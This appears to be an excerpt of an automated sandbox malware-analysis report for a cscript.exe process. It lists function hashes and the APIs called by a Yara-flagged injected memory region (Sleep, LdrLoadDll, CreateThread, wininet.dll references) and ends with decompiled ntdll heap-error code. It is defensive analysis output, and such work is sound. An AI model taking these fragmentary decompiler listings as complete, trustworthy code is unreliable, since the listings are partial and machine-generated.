Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1e792b413ac1b360c8ad922b0c40b2c41fb7dd7be1634c6e42a615eff29f73f9
Instruction ID: 8a9611422e6bf3f1a5de0062995ef88bf8ddb9962a80f1ea80b5532cb144818c
Opcode Fuzzy Hash: 1e792b413ac1b360c8ad922b0c40b2c41fb7dd7be1634c6e42a615eff29f73f9
Instruction Fuzzy Hash: 7290027124504842D14075994444A460075B7D0355F91D011A0054698D9AA58D55B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 054F9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 054F966A

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e04e00d7cf3983b8d6993cb00fb9008793e9ba197ef4415b5cbde513192f64b5
Instruction ID: 284c6cc3ccf5c63e1e0043d27d215eaf8a4fd6dce4f5c977c19ff4da3a858121
Opcode Fuzzy Hash: e04e00d7cf3983b8d6993cb00fb9008793e9ba197ef4415b5cbde513192f64b5
Instruction Fuzzy Hash: 7E90027124100802D1807599444464A0065B7D1351FD1D015A0015658DCE958A5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 054F96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 054F96DA

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 75c1a071458937aafb8ac3fb5e9e4fa7fdc2211c69f144cfd956e7dc1a4fe182
Instruction ID: 9490a1979ee35ee24ec5016379e1896fbb17faf40a6567f499eb6379ffb43def
Opcode Fuzzy Hash: 75c1a071458937aafb8ac3fb5e9e4fa7fdc2211c69f144cfd956e7dc1a4fe182
Instruction Fuzzy Hash: 9790027124100842D10065994444B460065B7E0351F91D016A0114658D8A95C8517561

Uniqueness

Uniqueness Score: -1.00%

Function 054F96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 054F96EA

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0ab6d5034ea6b5e8662393d80c9e0f6bda13bf15045bac5364cf5023d84f3eda
Instruction ID: 7b556962483738019e2f447a1adccf1fb6e5be751ca61190c3ecea0ea3e69889
Opcode Fuzzy Hash: 0ab6d5034ea6b5e8662393d80c9e0f6bda13bf15045bac5364cf5023d84f3eda
Instruction Fuzzy Hash: 8890027124108802D1106599844474A0065B7D0351F95D411A441465CD8AD588917161

Uniqueness

Uniqueness Score: -1.00%

Function 054F9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 054F991A

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b9e2334f484cab6174ed868dc9fea23408dc26caf9c6d2f8eaca4dd87a2a77a0
Instruction ID: 61847ea9db9d65c5e61dbbbe2978107b921c78c26e98a919e21b48291d3cec9b
Opcode Fuzzy Hash: b9e2334f484cab6174ed868dc9fea23408dc26caf9c6d2f8eaca4dd87a2a77a0
Instruction Fuzzy Hash: B89002B124100402D140759944447460065B7D0351F91D011A5054558E8AD98DD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 054F99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 054F99AA

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2fc24df22ff1e544f38df0305208f4e619292b3b53ea57626ed90ec9e4000cf3
Instruction ID: 544db73e1f9f2aca1725d987ee066335d0d5d76b708ecf810f2c2fa21bb18c9e
Opcode Fuzzy Hash: 2fc24df22ff1e544f38df0305208f4e619292b3b53ea57626ed90ec9e4000cf3
Instruction Fuzzy Hash: CC9002A138100442D10065994454B060065F7E1351F91D015E1054558D8A99CC527166

Uniqueness

Uniqueness Score: -1.00%

Function 054F9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 054F984A

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3b7c624bceed1765c986fecb0652d40e807e6f6be101d5937a752d1c2bea5fb0
Instruction ID: d1af399ea50981d117445306a800564af6b3c7b3d44b1626b01c61192ebd1a02
Opcode Fuzzy Hash: 3b7c624bceed1765c986fecb0652d40e807e6f6be101d5937a752d1c2bea5fb0
Instruction Fuzzy Hash: 59900261282041525545B59944445074066B7E02917D1D012A1404954C89A69856E661

Uniqueness

Uniqueness Score: -1.00%

Function 054F9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 054F986A

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7781c2fa73b393e53502c9f0b62ebbcfb5fadbf1cd444a217faa80abb407b0b5
Instruction ID: 94d330987b6b3daff8693a2eedd7f18b40b650a8c690e70af86c32e44253781a
Opcode Fuzzy Hash: 7781c2fa73b393e53502c9f0b62ebbcfb5fadbf1cd444a217faa80abb407b0b5
Instruction Fuzzy Hash: 2D90027124100413D111659945447070069B7D0291FD1D412A041455CD9AD68952B161

Uniqueness

Uniqueness Score: -1.00%

Function 054F9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 054F9A5A

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ad0e756f5afe9d5f7da7f577273686afdfcd0d599792d32f0b49a79a0d13801c
Instruction ID: a3d1f3997b2c47d2a074aa363b8c4428fe55e571fe6981cce079f78e00fb243b
Opcode Fuzzy Hash: ad0e756f5afe9d5f7da7f577273686afdfcd0d599792d32f0b49a79a0d13801c
Instruction Fuzzy Hash: 4D90026125180042D20069A94C54B070065B7D0353F91D115A0144558CCD9588616561

Uniqueness

Uniqueness Score: -1.00%

Function 010E72F0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 010E7398

Strings

net.dll, xrefs: 010E7361, 010E73E7, 010E73BF, 010E73CB, 010E73F3
wininet.dll, xrefs: 010E734E, 010E7357

Memory Dump Source

Source File: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_10d0000_cscript.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: f28381371634e3e59558db18c6b45dd7a1ea631f91b647afad8fe66e6e937499
Instruction ID: d0492e28a50a8e09a47de61083ee91cb5a204e40e3feff53c317173b4668db13
Opcode Fuzzy Hash: f28381371634e3e59558db18c6b45dd7a1ea631f91b647afad8fe66e6e937499
Instruction Fuzzy Hash: 9D31A1B6601701AFC715DF69C8A4FABB7F8AF48700F00811DFA599B241D770A545CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 010E72E7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 010E7398

Strings

net.dll, xrefs: 010E7361, 010E73BF, 010E73CB
wininet.dll, xrefs: 010E734E, 010E7357

Memory Dump Source

Source File: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_10d0000_cscript.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 8e0df81112b655743443fb85f0ae27ef13277a37a278399f4a1ecfcc20b3f417
Instruction ID: 18b283728a0ca72fb742677c2229293da3b79c2c16c4686c121e43b27a1cd203
Opcode Fuzzy Hash: 8e0df81112b655743443fb85f0ae27ef13277a37a278399f4a1ecfcc20b3f417
Instruction Fuzzy Hash: 02319FB1A01301AFC755DF69C8A5FABBBF4AF48700F008169FA599B241D771A546CB90

Uniqueness

Uniqueness Score: -1.00%

Function 010E88DB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,010D3B93), ref: 010E890D

Strings

.z`, xrefs: 010E88FC, 010E8908

Memory Dump Source

Source File: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_10d0000_cscript.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 9cee4594537263631a69ae58260c78ec79fc7d08a182b15e3ca4525a5ac3d367
Instruction ID: 78a2518dae88485f09e032a538f6a3210319c01d37beab2806b65496bee4fdca
Opcode Fuzzy Hash: 9cee4594537263631a69ae58260c78ec79fc7d08a182b15e3ca4525a5ac3d367
Instruction Fuzzy Hash: 04E01AB26002146FD718EF99CC48EE777ADAF98250F014559FD1D5B251D670E910CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 010E88E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,010D3B93), ref: 010E890D

Strings

.z`, xrefs: 010E88FC, 010E8908

Memory Dump Source

Source File: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_10d0000_cscript.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 9a3ec62ebd4f5a25eb30c999dfa358e9c70c0fbd3af3a654bacca9ff0c8c71f4
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: EFE012B1200208ABDB18EF99CC48EA777ACAF88650F018598BE085B241C630E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 010D7280, Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 010D72DA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 010D72FB

Memory Dump Source

Source File: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_10d0000_cscript.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 02f145f125a75e18e8aaa600cf72fcdf14578446a06e99d9b5814a484796c736
Instruction ID: 93deb0eeeff53cf0a8e07c1b995e7c1e81cdbc73143d1b44f3dd982c389082ae
Opcode Fuzzy Hash: 02f145f125a75e18e8aaa600cf72fcdf14578446a06e99d9b5814a484796c736
Instruction Fuzzy Hash: C001F231A8032A7BE721A6958C02FFEB7AC5F14B50F050058FF44BA1C0EA94690687F5

Uniqueness

Uniqueness Score: -1.00%

Function 010D7303, Relevance: 3.0, APIs: 2, Instructions: 29
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 010D72DA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 010D72FB

Memory Dump Source

Source File: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_10d0000_cscript.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b395cf0dedc4d85e79cbab5e7f39fde38229aaf53190158a1255ae2d59801d98
Instruction ID: 62d48a4915b21552425b73ea8e7f32a34c161aadaf8ce4f78daf928b1e0533b2
Opcode Fuzzy Hash: b395cf0dedc4d85e79cbab5e7f39fde38229aaf53190158a1255ae2d59801d98
Instruction Fuzzy Hash: 86E0CD707C031935F66255445C03FBD7768EB41F45F500096FF44DA1D1EAC5551647F2

Uniqueness

Uniqueness Score: -1.00%

Function 010D9B30, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 010D9BA2

Memory Dump Source

Source File: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_10d0000_cscript.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 95fb8e7be991e7a3834cfd23532fdb6265e305c358471754a12ee14398f87ec4
Instruction ID: 26279588403f3956017305e304b7f28ae2d4acf83fbadb56b59a2eca26256f3c
Opcode Fuzzy Hash: 95fb8e7be991e7a3834cfd23532fdb6265e305c358471754a12ee14398f87ec4
Instruction Fuzzy Hash: 7E0171B5E0020EBBDF10DBE5DD45FDDB7B89B54208F004195E94897241F671E708CB91

Uniqueness

Uniqueness Score: -1.00%

Function 010E7420, Relevance: 1.5, APIs: 1, Instructions: 36
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,010DCCE0,?,?), ref: 010E745C

Memory Dump Source

Source File: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_10d0000_cscript.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 4a43effd3a67b88a8349b4f3cd013ddbc44425b3f3c5715f4600d761e9296872
Instruction ID: 7b01a5cb0f25aa62bec0840f8dcf8be3f2064a2f95f0c1449365b2b744633026
Opcode Fuzzy Hash: 4a43effd3a67b88a8349b4f3cd013ddbc44425b3f3c5715f4600d761e9296872
Instruction Fuzzy Hash: CEE06D733802043AE220659AAC02FE7B6DCDB91B24F140466FB4DEB2C0D995F90142A4

Uniqueness

Uniqueness Score: -1.00%

Function 010E88A0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(010E3526,?,010E3C9F,010E3C9F,?,010E3526,?,?,?,?,?,00000000,00000000,?), ref: 010E88CD

Memory Dump Source

Source File: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_10d0000_cscript.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 84881646d78a7681836a801baa8377540918e7574f6b9f5c939cac87bdc2a1ad
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: D9E012B1200208ABDB18EF99CC44EA777ACAF88654F118598BE085B241C630F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 010E8A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,010DCFB2,010DCFB2,?,00000000,?,?), ref: 010E8A70

Memory Dump Source

Source File: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_10d0000_cscript.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 7c837670aec35886dcf08a1945e14e83c19c1ffe1eded231ed55dfd78d711011
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 5FE01AB12002086BDB14DF49CC84EE737ADAF88650F018558BE0857241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 010DD420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,010D7C83,?), ref: 010DD44B

Memory Dump Source

Source File: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_10d0000_cscript.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction ID: 030cd8e196707a7ad8e01ad718ad7c68ec8e02c9212556c3b3fdef2b0c0081fe
Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction Fuzzy Hash: CAD05E717503042BE610BAA89C06F6676C86B54A00F4940A4FA889B3C3D954E4004161

Uniqueness

Uniqueness Score: -1.00%

Function 054F967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 054F9694

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aadca375edf6d41e6a579dca54b089db1c2280d42bdf348f428ac76323e60e8d
Instruction ID: 16a6bde3e56f230c9aceb6d8fab342cea5217cd2e4556152d5129cf7e1478961
Opcode Fuzzy Hash: aadca375edf6d41e6a579dca54b089db1c2280d42bdf348f428ac76323e60e8d
Instruction Fuzzy Hash: C5B09B719414C5C5E611D7A54608B277A517BD0751F56C052D2020755A4778C091F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0556B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE

Download Yara Rule

Strings

The critical section is owned by thread %p., xrefs: 0556B3B9
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0556B47D
read from, xrefs: 0556B4AD, 0556B4B2
*** enter .cxr %p for the context, xrefs: 0556B50D
The instruction at %p referenced memory at %p., xrefs: 0556B432
*** Inpage error in %ws:%s, xrefs: 0556B418
This failed because of error %Ix., xrefs: 0556B446
a NULL pointer, xrefs: 0556B4E0
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0556B2DC
write to, xrefs: 0556B4A6
an invalid address, %p, xrefs: 0556B4CF
Go determine why that thread has not released the critical section., xrefs: 0556B3C5
The resource is owned shared by %d threads, xrefs: 0556B37E
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0556B476
*** An Access Violation occurred in %ws:%s, xrefs: 0556B48F
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0556B39B
*** enter .exr %p for the exception record, xrefs: 0556B4F1
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0556B323
*** then kb to get the faulting stack, xrefs: 0556B51C
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0556B3D6
*** Resource timeout (%p) in %ws:%s, xrefs: 0556B352
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0556B38F
<unknown>, xrefs: 0556B27E, 0556B2D1, 0556B350, 0556B399, 0556B417, 0556B48E
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0556B53F
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0556B314
The instruction at %p tried to %s , xrefs: 0556B4B6
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0556B305
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0556B2F3
The resource is owned exclusively by thread %p, xrefs: 0556B374
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0556B484

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: aecab6ffd449870235a3f72e301e5d7170d529de702163e1eb47e30fbfca74b3
Instruction ID: 2c658ce98d0c46c57368168faabb9fa6c2ef1f8a4660aab7944183bcd61a6fdb
Opcode Fuzzy Hash: aecab6ffd449870235a3f72e301e5d7170d529de702163e1eb47e30fbfca74b3
Instruction Fuzzy Hash: 8A812876B40250FFDB259A05CC89DBB3B37FF966A5F800055F105AB112E7718512DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 05571C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E05571C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x54948a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E054BB150();
				} else {
					E054BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x55a589c);
				E054BB150("Heap error detected at %p (heap handle %p)\n",  *0x55a58a0);
				_t27 =  *0x55a5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M05571E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E054BB150();
				} else {
					E054BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E054BB150("Error code: %d - %s\n",  *0x55a5898);
				_t113 =  *0x55a58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E054BB150();
					} else {
						E054BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E054BB150("Parameter1: %p\n",  *0x55a58a4);
				}
				_t115 =  *0x55a58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E054BB150();
					} else {
						E054BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E054BB150("Parameter2: %p\n",  *0x55a58a8);
				}
				_t117 =  *0x55a58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E054BB150();
					} else {
						E054BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E054BB150("Parameter3: %p\n",  *0x55a58ac);
				}
				_t119 =  *0x55a58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E054BB150();
					} else {
						E054BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x55a58b4);
					E054BB150("Last known valid blocks: before - %p, after - %p\n",  *0x55a58b0);
				} else {
					_t120 =  *0x55a58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
